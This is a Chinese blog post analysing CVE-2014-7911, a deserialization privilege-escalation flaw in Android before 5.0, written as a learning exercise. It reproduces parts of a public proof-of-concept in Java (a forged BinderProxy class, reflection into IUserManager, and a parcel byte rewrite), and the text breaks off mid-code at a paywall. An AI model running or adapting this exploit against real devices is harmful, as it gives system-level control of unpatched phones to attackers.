CVE-2014-7911 Android 反序列化漏洞分析

最新推荐文章于 2024-06-08 09:58:29 发布
最新推荐文章于 2024-06-08 09:58:29 发布
阅读量3.5k 收藏 2
点赞数
分类专栏: Android安全 文章标签: 漏洞 CVE 2014-7911 反序列化
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u010651541/article/details/55804520
版权

  网上对于此漏洞的分析已经很多了,由于这个漏洞设计了很多底层的知识,很值得学习。总算耐着性子把这个漏洞分析了一下,文章主要记录自己的分析过程。

一、基础知识

  要完成此漏洞的分析,需要不少基础知识支持。主要有:

二、实验环境

  由于CVE-2014-7911影响了Android 5.0一下版本,所以实验设备需要And容地5.0以下。注意,部分看下手机的系统发布时间,可能OEM针对此漏洞发布了对应的漏洞补丁。另外,我看到资料上说不要使用模拟器,原始是在模拟器上不能通过反射获取系统服务。我一开始在模拟器上运行PoC代码,确实不能成功。我的实验环境如下:

Android 版本:4.3
手机:三星S3联通定制版(坑了我半天)

三、漏洞分析

1. Java层分析

  首先看下漏洞成因:在Android <5.0系统中,java.io.ObjectInputStream不校验传入的java对象是否是可序列化的。于是,攻击者可以构造一个不可序列话的java对象,并且此Java对象包含了攻击者控制的恶意成员变量。在binder 的server端收到请求时,ObjectInputStream将不可序列化的java对象进行序列化,于是发生类型混淆,攻击者控制的成员变量被当成指针处理。根据此指针可以改变程序的执行流程,进一步向system_server进程注入代码,由于system_server拥有system权限,从而使得注入的代码以system权限执行,达到了提权的目的。

  从众多的Android类或者Java类中寻找一个不可序列化的对象,从retme7公开的PoC代码中可以看到,利用了Android.os.BinderProxy类。之所以利用BinderProxy类,可能是因为利用此类在GC(垃圾回收)时的指针更加容易控制。即Android.os.BinderProxy对象的mOrgue成员。大神是如何找到这样的好利用的对象的?

  同时,不可序列化的Android.os.BinderProxy需要被处理,即需要server端进行反序列化,才能产生类型混淆。Android中的Binder机制很好地解决了这个问题,binder Client中放入一个序列化对象,在Binder Server端就对此对象进行反序列化。但是,由于在Binder Client中添加的对象需要是可序列化的,所以这一采用了一个技巧。即先构造可序列化的AAdroid.os.Binder对象,将其添加到Binder的发送数据中,但是,在发送前进行一次类似序列化的操作,把AAdroid.os.Binder改成Android.os.Binder对象。这样,server在处理的时候,就会是除了不可序列化的对象。

package AAdroid.os;

import java.io.Serializable;

public class BinderProxy implements Serializable {
   
    private static final long serialVersionUID = 0;
    public int mObject = 0x1337beef;
    public int mOrgue = 0x1337beef;
}

  通过反射获取Binder对象,这里使用的是IUserManager系统服务。但是,个人觉得通过其他的系统服务也是可以做到的。

    void expolit(int static_address) {
        Context ctx = getBaseContext();
        try {
            Bundle b = new Bundle();
            AAdroid.os.BinderProxy evilProxy = new AAdroid.os.BinderProxy();
            evilProxy.mOrgue = static_address;
            b.putSerializable("eatthis", evilProxy);

            Class clIUserManager = Class.forName("android.os.IUserManager");
            Class[] umSubclasses = clIUserManager.getDeclaredClasses();
            System.out.println(umSubclasses.length + " inner classes found");
            Class clStub = null;
            for (Class c : umSubclasses) {
                System.out.println("inner class: " + c.getCanonicalName());
                if (c.getCanonicalName().equals("android.os.IUserManager.Stub")) {
                    clStub = c;
                }
            }

            Field fTRANSACTION_setApplicationRestrictions = clStub
                    .getDeclaredField("TRANSACTION_setApplicationRestrictions");
            fTRANSACTION_setApplicationRestrictions.setAccessible(true);
            TRANSACTION_setApplicationRestrictions = fTRANSACTION_setApplicationRestrictions
                    .getInt(null);

            UserManager um = (UserManager) ctx
                    .getSystemService(Context.USER_SERVICE);
            Field fService = UserManager.class.getDeclaredField("mService");
            fService.setAccessible(true);
            Object proxy = fService.get(um);

            Class[] stSubclasses = clStub.getDeclaredClasses();
            System.out.println(stSubclasses.length + " inner classes found");
            clProxy = null;
            for (Class c : stSubclasses) {
                System.out.println("inner class: " + c.getCanonicalName());
                if (c.getCanonicalName().equals(
                        "android.os.IUserManager.Stub.Proxy")) {
                    clProxy = c;
                }
            }

            Field fRemote = clProxy.getDeclaredField("mRemote");
            fRemote.setAccessible(true);
            mRemote = (IBinder) fRemote.get(proxy);

            UserHandle me = android.os.Process.myUserHandle();
            setApplicationRestrictions(ctx.getPackageName(), b, me.hashCode());

            Log.i("badserial",
                    "waiting for boom here and over in the system service...");
        } catch (Exception e) {
            throw new RuntimeException(e);
        }
    }

  setApplicationRestrictions()函数就是完成发送不可序列化的Android.os.BinderProxy给服务端的操作。

public void setApplicationRestrictions(java.lang.String packageName,
            android.os.Bundle restrictions, int userHandle)
            throws android.os.RemoteException {
        android.os.Parcel _data = android.os.Parcel.obtain();
        android.os.Parcel _reply = android.os.Parcel.obtain();
        try {
            _data.writeInterfaceToken(DESCRIPTOR);
            _data.writeString(packageName);
            _data.writeInt(1);
            restrictions.writeToParcel(_data, 0);
            _data.writeInt(userHandle);

            byte[] data = _data.marshall();
            for (int i = 0; true; i++) {
   
                if (data[i] == 'A' && data[i + 1] == 'A' && data[i + 2] == 'd'
                        && data[i + 3] == 'r') {
                    data[i] = 'a';
                    data[i + 1] = 'n';
                    break;
最低0.47元/天 解锁文章
Venscor
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
android fastjson漏洞_fastjson反序列化漏洞研究(上)
weixin_39793708的博客
12-19 178
前言最近护网期间,又听说fastjson传出“0day”,但网上并没有预警,在github上fastjson库中也有人提问关于fastjson反序列化漏洞的详情。也有人说是可能出现了新的绕过方式。不管怎样这都激起了我研究该漏洞的欲望,以前也研究过java的反序列化漏洞,但是没有具体研究过fastjson这个,借此机会好好分析下这个洞。正文fastjson主要功能就是实现对象和json字符串相互进行...
安卓序列化漏洞 —— CVE-2015-3525
weixin_34009794的博客
09-14 143
      在2014年,Jann Horn发现一个安卓的提权漏洞,该漏洞允许恶意应用从普通应用权限提权到system用户执行命令,漏洞信息与POC见(1]。漏洞的成因源于在安卓系统(&lt;5.0)中,java.io.ObjectInputStream并未校验输入的java对象是否是实际可序列化的。攻击者因此可以构建一个不可序列化的java对象实例,恶意构建其成员变量,当该对象实例被Object...
APKDeepLens:Android应用安全扫描利器
最新发布
gitblog_00099的博客
06-08 666
APKDeepLens:Android应用安全扫描利器 项目地址:https://gitcode.com/d78ui98/APKDeepLens APKDeepLens 是一款基于Python的工具,专为检测Android应用程序(APK文件)中的安全漏洞而设计。它聚焦于OWASP移动安全的Top 10威胁,为开发者、渗透测试员和安全研究人员提供了便捷高效的评估手段。 功能特性 APKDeepL...
再论CVE-2014-7911安卓序列化漏洞
weixin_34377919的博客
03-08 410
小荷才露尖尖角 · 2015/11/11 16:110x00 回顾CVE-2014-7911是一个非常值得安卓安全研究者学习的漏洞,其漏洞成因和漏洞利用涉及java序列化、安卓Binder IPC通信、ROP、Stack Pivot、heap Spray及多方面的知识。本文上篇drops.wooyun.org/mobile/6082对漏洞成因及Crash POC进行了分析。本篇结合retme、se...
android序列化异常,漏洞预警 | Android系统序列化、反序列化不匹配漏洞
weixin_30110807的博客
05-28 532
前言近期我们在Android序列化对象中发现了多个安全漏洞,序列化是android系统中很常用也很重要的一个过程,此类漏洞正是利用序列化过程前后数据不匹配导致的越权操作,可以让攻击者重置手机pin码、安装或卸载用户应用,部分漏洞已经在2018年四月份的Android安全公告中披露并分配CVECVE-2017-13286, CVE-2017-13288, CVE-2017-13289。利用漏洞可以...
CVE-2014-7911poc
07-04
原版来自网上大神,略修改。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。
Jackson 最新反序列化漏洞(CVE-2019-14361和CVE-2019-14439)
05-08
Jackson官方github仓库发布安全issue,涉及漏洞CVE-2019-14361和CVE-2019-14439,均是针对CVE-2019-12384漏洞的绕过利用方式,当用户提交一个精心构造的恶意JSON数据到WEB服务器端时,可导致远程任意代码执行。...
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
工具"Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271"是针对这一特定漏洞的检测与防护解决方案。 首先,我们来理解什么是Java反序列化漏洞。在Java中,序列化是将对象的状态转化为...
CVE-2021-26295 Apache OFBiz 反序列化漏洞.md
04-13
CVE-2021-26295 Apache OFBiz 反序列化漏洞
JBossMQJMS 反序列化漏洞CVE-2017-7504)漏洞利用工具
07-23
JBossMQJMS 反序列化漏洞CVE-2017-7504)是针对企业级Java消息服务(JMS)提供商JBossMQ的一个严重安全问题。该漏洞源于应用程序未能正确处理反序列化的对象,使得攻击者可以通过精心构造的恶意输入触发任意代码...
CVE-2020-9496 ofbiz反序列化漏洞分析1
08-03
CVE-2020-9496 ofbiz反序列化漏洞分析 OFBiz是一个非常著名的电子商务平台,是一个非常著名的开源项目,提供了创建基于最新J2EE/XML规范和技术标准,构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、...
CVE-2014-7911分析+代码
07-04
代码原版来自网上大神,略修改 代码原版来自网上大神,略修改 代码原版来自网上大神,略修改 代码原版来自网上大神,略修改
MismatchParcel:Android序列化反序列化不匹配导致的一个安全问题的解析
05-13
Android中的序列化反序列化不匹配导致的漏洞解析 本文仅供安全技术交流,请勿用于不正当的用途,造成的一切后果与本文作者无关. 0x00 前言 上一次提到了这个漏洞,其中提到了修补方案,就是去验证intent指向的app和appB是不是有相同签名的,这里有这样一段: if (result != null + && (intent = result.getParcelable(AccountManager.KEY_INTENT)) != null) { + /* + * The Authenticator API allows third party authenticators to + * supply arbitrary intents to other
[车联网安全自学篇] Android安全之Android 序列化漏洞「浅析」
橙留香Park的博客
06-17 450
JAVA 序列化安全问题:Android JDK 的开发负责人说序列化是 Java 安全问题之源在 Android 开发中,Activity 、Fragment 、APP 等之间的数据传输,都仅支持基本类型,所以必须通过将对象序列化,让序列化后的对象可用于数据传输,因为系统底层并不认识对象,数据传输是以字节序列形式传递,以进程间通信为例,需要将对象转化为字节序列(字节序列中包括该对象的类型,成员信息等),然后在目标进程里通过反序列化字节序列,将字节序列转换成对象。...
CVE-2014-7911学习笔记
weixin_30546933的博客
01-22 84
工作日分析的差不多了,写个标题周末搞 转载于:https://www.cnblogs.com/vendanner/p/5150280.html
android fastjson漏洞_Fastjson 反序列化漏洞
weixin_32309879的博客
01-12 500
作者:Longofo@知道创宇404实验室时间:2020年4月27日Fastjson没有cve编号,不太好查找时间线,一开始也不知道咋写,不过还是慢慢写出点东西,幸好fastjson开源以及有师傅们的一路辛勤记录。文中将给出与Fastjson漏洞相关的比较关键的更新以及漏洞时间线,会对一些比较经典的漏洞进行测试及修复说明,给出一些探测payload,rce payload。Fastjson解析流程...
CVE-2014-7911 Android本地提权漏洞分析与利用
omnispace的博客
10-05 5773
概述 前面我们了解了Android Binder机制的基本原理,当然仅仅了解是不够的,我们要做到:Know it and hack it。这篇文章我们就来分析一个和Binder相关的漏洞CVE-2014-7911。这是由Jann Horn发现的一个Android本地提权漏洞,能够使普通应用的权限提升到System权限,影响Android5.0以下版本。这个漏洞是非常值得Android安全研
CVE-2014-7911: Android <5.0 Privilege Escalation using ObjectInputStream (权限提升漏洞)
收集盒 Book box
11-29 962
In Android <5.0, java.io.ObjectInputStream did not check whether the Object that is being deserialized is actually serializable. That issue was fixed in Android 5.0 with this commit: https://android.g
Bundle 风水 - Android Parcel 序列化与反序列化不匹配系列漏洞
stven_king的专栏
04-25 646
Bundle 风水(Bundle Fengshui)是指在 Android 应用开发中,使用 Bundle 类传递数据时,需要注意一些优化技巧,以避免在传递数据过程中出现性能问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值